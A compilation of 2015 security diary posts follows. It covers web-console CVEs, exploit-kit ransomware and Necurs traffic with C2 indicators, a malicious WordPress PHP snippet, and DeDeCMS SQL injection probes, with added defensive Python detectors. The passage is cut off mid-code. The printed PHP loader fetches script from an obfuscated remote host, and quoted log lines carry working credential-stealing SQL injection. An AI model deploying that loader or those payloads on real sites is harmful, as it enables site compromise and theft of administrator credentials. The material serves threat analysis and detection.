Blue Coat: SSL Visibility Appliance web based vulnerabilities
Blue Coat has released a security advisory for SSL Visibility Appliance. The SSL Visibility Appliance is susceptible to multiple web-based vulnerabilities in the administration console. A remote attacker can use these vulnerabilities to obtain administrative access to the SSL Visibility Appliance. All versions of SSL Visibility prior to 3.8.4 are vulnerable.
The vulnerabilities that exist in the WebUI are:
- Cross-Site Request Forgery (CVE-2015-2852): Cross-site request forgery (CSRF) vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack the authentication of administrators.
- Clickjacking due to improper input validation (CVE-2015-2854): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not send a restrictive X-Frame-Options HTTP header, which allows remote attackers to conduct clickjacking attacks via vectors involving an IFRAME element.
- Cookie theft (CVE-2015-2855): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not set the secure flag for the administrator's cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, a different vulnerability than CVE-2015-4138.
- Session fixation (CVE-2015-2853): Session fixation vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack web sessions by providing a session ID.
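Two of the four issues above are visible directly in the appliance's HTTP responses: the missing X-Frame-Options header (CVE-2015-2854) and a session cookie set over HTTPS without the Secure flag (CVE-2015-2855). The following is an added example, not Blue Coat's code, of the response-head audit a defender can run against any management console; the two response heads and the cookie name SESSIONID are constructed placeholders.

```python
"""Audit an HTTP response head for two of the WebUI weaknesses in the advisory:
a missing or non-restrictive X-Frame-Options header (clickjacking, CVE-2015-2854)
and a cookie issued over HTTPS without the Secure flag (cookie theft,
CVE-2015-2855). Added example, not Blue Coat's code. The two response heads
below are constructed; 'SESSIONID' is a placeholder cookie name."""

RESTRICTIVE_XFO = {"deny", "sameorigin"}

def parse_response_head(raw):
    """Return [(lower_name, value), ...] from a raw HTTP response head.
    A list is kept (not a dict) because Set-Cookie may appear more than once."""
    headers = []
    for line in raw.split("\r\n")[1:]:      # skip the status line
        if line == "":                      # blank line ends the head
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers

def cookie_attributes(set_cookie_value):
    """Split 'NAME=val; Path=/; Secure; HttpOnly' into (NAME, {'path','secure','httponly'})."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs

def audit_response(raw, over_https=True):
    """Return a list of findings (an empty list means both checks passed)."""
    findings = []
    headers = parse_response_head(raw)
    xfo = [v for n, v in headers if n == "x-frame-options"]
    if not xfo:
        findings.append("no X-Frame-Options header: page can be framed (clickjacking)")
    elif xfo[0].lower() not in RESTRICTIVE_XFO:
        findings.append("non-restrictive X-Frame-Options value: " + xfo[0])
    for n, v in headers:
        if n != "set-cookie":
            continue
        name, attrs = cookie_attributes(v)
        if over_https and "secure" not in attrs:
            findings.append("cookie %s issued over HTTPS without Secure flag" % name)
        if "httponly" not in attrs:
            findings.append("cookie %s lacks HttpOnly flag" % name)
    return findings

# Constructed response heads: the weak shape the advisory describes, and a fixed one.
WEAK_RESPONSE = ("HTTP/1.1 200 OK\r\n"
                 "Content-Type: text/html\r\n"
                 "Set-Cookie: SESSIONID=abc123; Path=/\r\n"
                 "\r\n"
                 "<html>...</html>")
HARDENED_RESPONSE = ("HTTP/1.1 200 OK\r\n"
                     "Content-Type: text/html\r\n"
                     "X-Frame-Options: DENY\r\n"
                     "Set-Cookie: SESSIONID=abc123; Path=/; Secure; HttpOnly\r\n"
                     "\r\n"
                     "<html>...</html>")

if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp) or ["no findings"])
```

The HttpOnly check is not part of the advisory; it is included because the same Set-Cookie parsing gives it for free and it is the usual companion of the Secure flag on an administrative session cookie.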
Workarounds:
- Limit access to the SSL Visibility management port to trusted clients with limited access to the outside internet. SSLV can be configured to limit the IP addresses capable of accessing the management port.
- Limit administrative capabilities by assigning distinct roles for different types of administrators.
- Use ProxySG and WebPulse to block access to malicious websites from clients.
Patches:
SSL Visibility
- SSLV 3.8 – a fix is available in 3.8.4.
- SSLV 3.8.2f – a fix will not be provided. Please upgrade to the latest release with the vulnerability fix.
- SSLV 3.7.4 – a fix will not be provided. Please upgrade to the latest release with the vulnerability fix.
For further details:
- https://bto.bluecoat.com/security-advisory/sa96
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2852
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2853
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2854
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2855
Angler exploit kit pushing CryptoWall 3.0
Introduction
In the past two days, I've infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24. Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB
On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host where Angler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [1]. On Wednesday, 2015-05-27 at 17:30 UTC, I infected a host where Angler EK sent CryptoWall 3.0 as the malware payload.
I usually see Angler EK send different types of ransomware [2, 3], and I've seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I've noticed CryptoWall from Angler EK.

Shown above: CryptoWall 3.0 decrypt instructions from the 2015-05-27 sample
Traffic from the infected host
CryptoWall 3.0 traffic has changed a bit from my first diary about it on 2015-01-19 [4]. Traffic below was seen from the infected host on 2015-05-27 starting at 17:30 UTC.

Shown above: Angler EK and CryptoWall 3.0 traffic as seen in Wireshark
Associated domains:
- 216.245.213.5 port 80 - vanskeligstesjeverozapadne1.xadultchat.com - Angler EK
- 91.184.19.41 port 80 - autorijschoolconsistent.nl - CryptoWall 3.0 check-in
- 213.186.33.50 port 80 - jeanrey.fr - CryptoWall 3.0 check-in
- 50.62.123.1 port 80 - 3bsgroup.com - CryptoWall 3.0 check-in
- 75.103.83.9 port 80 - braingame.biz - CryptoWall 3.0 check-in
- 62.221.204.114 port 80 - alsblueshelpt.nl - CryptoWall 3.0 check-in
- 184.168.47.225 port 80 - ammorgan.net - CryptoWall 3.0 check-in
- 79.96.220.223 port 80 - bezpiecznaswinka.pl - CryptoWall 3.0 check-in
- 148.251.140.60 port 80 - asadiag.com - CryptoWall 3.0 check-in
- 184.168.47.225 port 80 - alchemyofpresence.com - CryptoWall 3.0 check-in
- 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paygateawayoros.com - CryptoWall decrypt instructions
- 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paymentgateposa.com - CryptoWall decrypt instructions
- 7oqnsnzwwnm6zb7y.optionpaymentprak.com (didn't resolve in DNS) - CryptoWall decrypt instructions
- 7oqnsnzwwnm6zb7y.watchdogpayment.com (didn't resolve in DNS) - CryptoWall decrypt instructions
Angler EK:
- vanskeligstesjeverozapadne1.xadultchat.com - GET /molehill_inconsolably_erecting_prematureness/174208500231771131
- vanskeligstesjeverozapadne1.xadultchat.com - GET /OEmjzR2jUP6JG0o9h494My_bK-qvpSFR6NcLcwz5j32hxI3s
- vanskeligstesjeverozapadne1.xadultchat.com - GET /BjWMS7ksUcb9SztLJX7JlXe95voNnRcc7DfUJzRGbqTqKe8X
CryptoWall 3.0 check-in traffic:
- ip-addr.es - GET /
- autorijschoolconsistent.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=mr3jkiznke20nfh
- jeanrey.fr - POST /wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?w=mr3jkiznke20nfh
- 3bsgroup.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=mr3jkiznke20nfh
- braingame.biz - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=mr3jkiznke20nfh
- alsblueshelpt.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?n=mr3jkiznke20nfh
- asambleadedios.org - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=mr3jkiznke20nfh
- ammorgan.net - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?o=mr3jkiznke20nfh
- bezpiecznaswinka.pl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?k=mr3jkiznke20nfh
- asadiag.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?q=mr3jkiznke20nfh
- alchemyofpresence.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?z=mr3jkiznke20nfh
Note: These URLs repeated several times with different random strings at the end.
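The check-in requests above share one shape: a POST to a path under /wp-content/ on a compromised WordPress site ending in img<digit>.php, carrying a single one-letter query parameter whose value (mr3jkiznke20nfh) is the same for every host. The following is an added example, not the diary's code, of a log filter that matches that shape and correlates the token across hosts; the sample lines reuse the diary's "host - METHOD /path" notation, and the two lines for example.invalid are constructed benign traffic.

```python
"""Flag CryptoWall 3.0 check-in requests of the shape listed above in HTTP or
proxy logs: a POST to a path under /wp-content/ ending in img<digit>.php, with
exactly one single-letter query parameter whose value is a short alphanumeric
token that is identical across every check-in host. Added example, not the
diary's code. Sample lines reuse the diary's 'host - METHOD /path' notation;
the two example.invalid lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

CHECKIN_PATH = re.compile(r"^/wp-content/.*/img\d\.php$")
TOKEN = re.compile(r"^[a-z0-9]{10,20}$")
LINE = re.compile(r"^(\S+) - (GET|POST) (\S+)$")

def parse_line(line):
    """'host - METHOD /path?query' -> (host, method, url) or None."""
    m = LINE.match(line.strip())
    return m.groups() if m else None

def checkin_token(method, url):
    """Return the token if (method, url) matches the check-in shape, else None."""
    parts = urlsplit(url)
    if method != "POST" or not CHECKIN_PATH.match(parts.path):
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    if len(params) != 1:
        return None
    key, value = params[0]
    return value if len(key) == 1 and TOKEN.match(value) else None

def correlate(lines):
    """Map each token to the sorted hosts it was posted to, so one infected
    machine's fan-out across compromised sites shows up as a single entry."""
    hosts_by_token = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, method, url = parsed
        token = checkin_token(method, url)
        if token:
            hosts_by_token[token].add(host)
    return {t: sorted(h) for t, h in hosts_by_token.items()}

SAMPLE_LINES = [
    "ip-addr.es - GET /",
    "autorijschoolconsistent.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=mr3jkiznke20nfh",
    "jeanrey.fr - POST /wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?w=mr3jkiznke20nfh",
    "3bsgroup.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=mr3jkiznke20nfh",
    # constructed benign traffic that shares parts of the shape but must not match
    "example.invalid - GET /wp-content/uploads/2015/05/img1.php?c=mr3jkiznke20nfh",
    "example.invalid - POST /wp-content/plugins/contact-form/submit.php?form=contact&page=2",
]

if __name__ == "__main__":
    for token, hosts in correlate(SAMPLE_LINES).items():
        print("token %s posted to %d hosts: %s" % (token, len(hosts), ", ".join(hosts)))
```

Correlating on the token rather than on the host names is what makes the rule durable: the compromised sites rotate, the token is per-infection.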
Traffic caused by viewing the CryptoWall decrypt instructions in a browser:
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /1kwN8ko
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/style.css
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/us.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/it.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rt.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/fr.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /picture.php?k=1kwn8ko&4d2156f57fb503178f62c2f95690e599
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rb.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/es.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/de.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lb.png
- 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lt.png

Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion
Preliminary malware analysis
Malware payload delivered by Angler EK on 2015-05-27:
- File size: 232.5 KB ( 238080 bytes )
- MD5 hash: 30ca927d6e800177937788703fc87301
- Detection ratio: 2 / 57
- First submitted: 2015-05-27 19:15:02 UTC
- https://www.virustotal.com/en/file/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792/analysis/
- https://malwr.com/analysis/NGFmYjBiYmQ0N2M2NGExNDhlOTA0OWMzMDk1ZDg5MzM/
- https://www.hybrid-analysis.com/sample/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792?environmentId=2
Final words
A pcap of the 2015-05-27 infection traffic is available at:
A zip file of the associated malware is available at:
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://malware-traffic-analysis.net/2015/05/26/index.html
[2] https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
[3] http://malware-traffic-analysis.net/2015/03/25/index.html
[4] https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203
Possible Wordpress Botnet C&C: errorcontent.com
Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):
#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */
/* only run the code if this is Chrome or IE and not a "bot" */
if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{  
# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]
  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?  ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);
# check if we have the curl extension installed 
if (function_exists('curl_init') && function_exists('curl_exec')) {
$ch= curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_8610mezd = curl_exec ($ch);
curl_close($ch);} 
# if we don't have curl, try file_get_contents which requires allow_url_fopen.
elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}
# or try fopen as a last resort
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}
if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }
# The data retrieved is echoed back to the user if its characters 2-4 are "scr" (e.g. it begins with "<script").
I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is anybody able to retrieve content from errorcontent.com?
According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.
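The snippet's domain is split into fragments ("error"."content".".com") precisely so that a grep for the hostname across the web root finds nothing. The following is an added example, not the diary's code nor the submitted snippet, of a scanner that first collapses PHP string concatenation and then looks for the combination of traits described above (errors suppressed, User-Agent inspected, remote content fetched and echoed). SAMPLE_PHP is a constructed re-typing of the snippet's structure with placeholder variable names; BENIGN_PHP is constructed too.

```python
"""Scan PHP source for the pattern of the snippet above: error output
suppressed, the client's User-Agent inspected, a URL assembled from
concatenated string fragments, fetched, and echoed back to the visitor.
Added example, not the diary's code nor the submitted snippet. SAMPLE_PHP is
a constructed re-typing of the snippet's structure with placeholder variable
names; BENIGN_PHP is constructed as well."""
import re

# Two or more adjacent PHP string literals joined with '.', e.g. "a"."b"
CONCAT = re.compile(r"""("[^"]*"|'[^']*')(\s*\.\s*("[^"]*"|'[^']*'))+""")
LITERAL = re.compile(r"""(?:"([^"]*)"|'([^']*)')""")
URL = re.compile(r"""["'](https?://[^"']+)""")

INDICATORS = [
    ("errors suppressed", re.compile(r"error_reporting\s*\(\s*0\s*\)|display_errors['\"]\s*,\s*0")),
    ("user-agent inspected", re.compile(r"HTTP_USER_AGENT")),
    ("remote content fetched", re.compile(r"curl_exec|file_get_contents\s*\(\s*\$|stream_get_contents")),
    ("fetched content echoed", re.compile(r"echo\s+\$")),
]

def collapse_literals(src):
    """Rewrite "http://"."error"."content" into "http://errorcontent" so that
    domain-splitting obfuscation does not defeat plain string matching."""
    def join(m):
        pieces = LITERAL.findall(m.group(0))
        return '"' + "".join(a or b for a, b in pieces) + '"'
    return CONCAT.sub(join, src)

def scan(src, min_indicators=3):
    """Return the indicators hit, the URLs visible after collapsing, and a verdict."""
    flat = collapse_literals(src)
    hits = [name for name, rx in INDICATORS if rx.search(flat)]
    urls = URL.findall(flat)
    return {"indicators": hits, "urls": urls,
            "suspicious": len(hits) >= min_indicators and bool(urls)}

# Constructed: same structure as the submitted snippet, placeholder variable names.
SAMPLE_PHP = r"""<?php
error_reporting(0);
@ini_set('display_errors',0);
$ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua)) {
  $u = "http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&ua=".urlencode($ua);
  if (function_exists('curl_init')) {
    $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $out = curl_exec($ch); curl_close($ch);
  }
  if (substr($out, 1, 3) === 'scr') { echo $out; }
}
"""
# Constructed: ordinary code that also concatenates strings, to show the rule does not fire on it.
BENIGN_PHP = r"""<?php
$greeting = "Hello, "."world";
echo htmlspecialchars($greeting);
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_PHP), ("benign", BENIGN_PHP)):
        print(label, scan(src))
```

The single-quote pattern can span across code when quotes are unbalanced, which is a known limitation of regex-level PHP parsing; the indicator count, not any one match, drives the verdict.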
Business Value in "Big Data"
There is more information available as to what Big Data really means. In the type of business most of us deal with daily, you are likely swamped by a huge amount of structured or unstructured data that is entirely, partially or not at all collected. Some of the reasons to collect that data are competitive advantage, network security, operational issues, etc., but the real power of that information lies in making timely decisions.
A study conducted by Forrester in 2011 estimated "[...] that firms effectively utilize less than 5% of available data. Why so little? The rest is simply too expensive to deal with."[1] That still leaves 95% of data untouched and unanalyzed. Depending on who you ask what Big Data means to them, you may get different answers: volume, speed, variety, type and quality. Depending on the size of the network, you may lack the storage capacity to ingest and process everything the network is capable of generating, and have to make difficult choices about what is most important to collect in order to make those timely decisions.
I think that in order to make significant gains from collecting Big Data, there is a need for a comprehensive approach to managing data and to how it is analyzed to gain information intelligence. That means choosing the right data, turning structured or unstructured data into a common format (e.g. CEF is a widely supported format), reducing the data footprint by keeping and aggregating a single copy of similar data (deduplication), and having an archiving policy for old data.
We would like to hear from you. Are you currently evaluating what to do with your data and, based on your current security posture, do you think the data you currently collect is enough to get valuable insight into what is going on inside your network?
Note: If interested in sharing, Stephen Northcutt is currently looking for SEIM/SIEM success stories.
[1] http://blogs.forrester.com/brian_hopkins/11-09-30-big_data_will_help_shape_your_markets_next_big_winners
[2] https://protect724.hp.com/docs/DOC-1072
[3] https://www.linkedin.com/pulse/seimsiem-success-story-request-stephen-northcutt?trk=mp-reader-card
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
Lazy Coordinated Attacks Against Old Vulnerabilities
Typically we try to divide attackers into different groups, all the way from script kiddies (no resources, no skills, quite a bit of time/persistence) to more advanced state-sponsored attackers (lots of resources, decent skills and the ability to conduct long-lasting, persistent attacks).
So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS being conducted from what looks like several IP addresses at the same time, which appeared to share the load.
The attack:
GET /uploads/plus/search.php?keyword=11& typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"
DeDeCMS is a Drupal-like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site attacked above does not use DeDeCMS, so the attacker did not do any reconnaissance.
The attacker also doesn't bother modifying the user agent and keeps the "Python-urllib/2.7" user agent, indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.
The SQL statement that is being attempted:
SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1
A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.
Sort of interesting: these were not the only attacks from these two IP addresses, and they did start out with some reconnaissance:
GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Here they spoof the Google user agent. They even first try out the "plus/search.php" URL:
GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
But even though it returns a 404, they still proceed with the attack.
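The two probes above are easy to triage once the URL is percent-decoded: the first carries information_schema and the floor(rand()) error-based trick behind a Python-urllib user agent, the second a UNION SELECT behind a claimed Googlebot. The following is an added example, not the diary's code, of a small log triage routine that decodes each request line and applies WAF-style signatures to the path and User-Agent; SAMPLE_LOG holds the diary's three log excerpts plus one constructed benign request.

```python
"""Decode and triage web server request lines like the two DeDeCMS probes
above: percent-decode the URL, then apply a few WAF-style signatures to the
path and the User-Agent. Added example, not the diary's code. SAMPLE_LOG holds
the diary's three log excerpts plus one constructed benign request."""
import re
from urllib.parse import unquote_plus

# '<METHOD> <path> HTTP/1.x" <status> <bytes> "<referer>" "<user-agent>'
# The path is matched lazily because these probes contain literal spaces, and
# the closing quote is optional because one excerpt above lacks it.
LOG_LINE = re.compile(r'^(GET|POST|HEAD) (.*?) HTTP/1\.[01]" (\d{3}) (\d+|-) "([^"]*)" "([^"]*)"?$')

RULES = [
    # (name, field to test, pattern)
    ("scripted client UA", "ua", re.compile(r"python-urllib|curl/|wget/|libwww", re.I)),
    ("claims to be Googlebot", "ua", re.compile(r"googlebot", re.I)),   # confirm via reverse DNS
    ("information_schema access", "path", re.compile(r"information_schema", re.I)),
    ("UNION SELECT", "path", re.compile(r"union\s+select", re.I)),
    ("error-based floor(rand())", "path", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("inline SQL comment", "path", re.compile(r"/\*.*?\*/")),
]

def decode_path(raw):
    """Percent-decode up to twice (catches double encoding) and collapse whitespace."""
    decoded = unquote_plus(raw)
    if "%" in decoded:
        decoded = unquote_plus(decoded)
    return re.sub(r"\s+", " ", decoded)

def analyse(line):
    """Return the decoded request and the rule names it triggers, or None if unparsable."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    method, path, status, _size, _referer, ua = m.groups()
    fields = {"path": decode_path(path), "ua": ua}
    hits = [name for name, field, rx in RULES if rx.search(fields[field])]
    return {"method": method, "status": int(status), "path": fields["path"], "ua": ua, "hits": hits}

# Three lines quoted from the diary above, then one constructed benign request.
SAMPLE_LOG = r'''
GET /uploads/plus/search.php?keyword=11& typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"
GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"
'''

def triage(log=SAMPLE_LOG):
    """Analyse every parsable line of a log blob."""
    return [r for r in (analyse(l) for l in log.strip().splitlines()) if r]

if __name__ == "__main__":
    for r in triage():
        print(r["status"], r["ua"][:32], r["hits"])
```

The status code is kept in the output because, as noted above, a 301 or 404 did not stop this attacker; a scanner that ignores responses is itself a signal worth keeping.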
[1] http://dedecms.com
[2] http://0day5.com/archives/341
Exploit kits delivering Necurs
Introduction
In the past few days, we've seen Nuclear and Angler exploit kits (EKs) delivering malware identified as Necurs. It certainly isn't the only payload sent from Nuclear and other EKs, but I hadn't really looked into EK traffic sending Necurs lately.
Documented as early as 2012, Necurs is a type of malware that opens a back door on the infected computer [1]. It may also disable antivirus products as well as download additional malware [1][2].
I saw Necurs as a malware payload from Nuclear and Angler EKs last week [3][4]. In each case, traffic went through a gate on 185.14.30.218 (between the compromised website and the EK landing page).
We ran across Nuclear EK delivering Necurs again on 2015-05-20. In this example, the gate was on 91.121.63.249.
I can't share info on the compromised website that kicked off this infection chain; however, we can look at the rest of the traffic.
Infection traffic details
Associated domains:
- 91.121.63.249 port 80 - try.jleveux.com - Redirect (gate) to exploit kit
- 162.247.13.233 port 80 - os.jackmap.com - Nuclear EK
- 188.165.138.220 port 80 - 188.165.138.220 - Post-infection HTTP traffic caused by Necurs
- various IP addresses on various ports - Other post-infection traffic (see below)

Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion
Redirect (gate) leading to the EK:
- 2015-05-20 17:03:32 UTC - try.jleveux.com - GET /js/view.js
Nuclear EK:
- 2015-05-20 17:03:32 UTC - os.jackmap.com - GET /CQEWFR9SHVgRTQkCAlwPAhNNAlgP.html
- 2015-05-20 17:03:33 UTC - os.jackmap.com - GET /BE8SHwtVFUEeUh9SHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB8FDQY
- 2015-05-20 17:03:34 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfUEsNEE0JAFQJDgITT1QNDh9VVxlTW1RNVwBMUltRHQZWUFFSVQZWUlAfVEsxIBARBkc
- 2015-05-20 17:03:36 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB9WHXIAJyE5MHM
HTTP POST requests from the infected host:
- 2015-05-20 17:03:52 UTC - 188.165.138.220 - POST /forum/db.php
- 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
- 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
- 2015-05-20 17:04:46 UTC - 188.165.138.220 - POST /forum/db.php
DGA-style DNS requests from the infected host:
- 2015-05-20 17:03:37 UTC - DNS query for: tihvekkgxvjjstk.com - server response: No such name
- 2015-05-20 17:03:37 UTC - DNS query for: aywqalevruhie.com - server response: No such name
- 2015-05-20 17:03:37 UTC - DNS query for: jdwkjeyumdxbc.com - server response: No such name
- 2015-05-20 17:03:37 UTC - DNS query for: nsktpgiexicpnt.com - server response: No such name
- 2015-05-20 17:03:38 UTC - DNS query for: npkxghmoru.biz - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: llncjudabb.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: veqtdpofgjwe.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: acsgneqxcsoyvmc.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: lbvruinysrbpyjr.com - server response: No such name
- 2015-05-20 17:04:37 UTC - DNS query for: npkxghmoru.biz - server response: No such name
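The DNS list above is the textbook DGA footprint: two bursts, a minute apart, of lookups for random-looking names that all come back NXDOMAIN. The following is an added example, not the diary's code, of a detector that parses the diary's own "timestamp UTC - DNS query for: name - server response: answer" lines, groups NXDOMAIN answers into short windows and annotates each burst with how many labels look random; the two lines that received an address (example.com, example.net) are constructed.

```python
"""Pick out the DGA-style behaviour in the DNS list above: bursts of lookups
for random-looking domains that all return NXDOMAIN within a few seconds.
Added example, not the diary's code. The parser reads the diary's own
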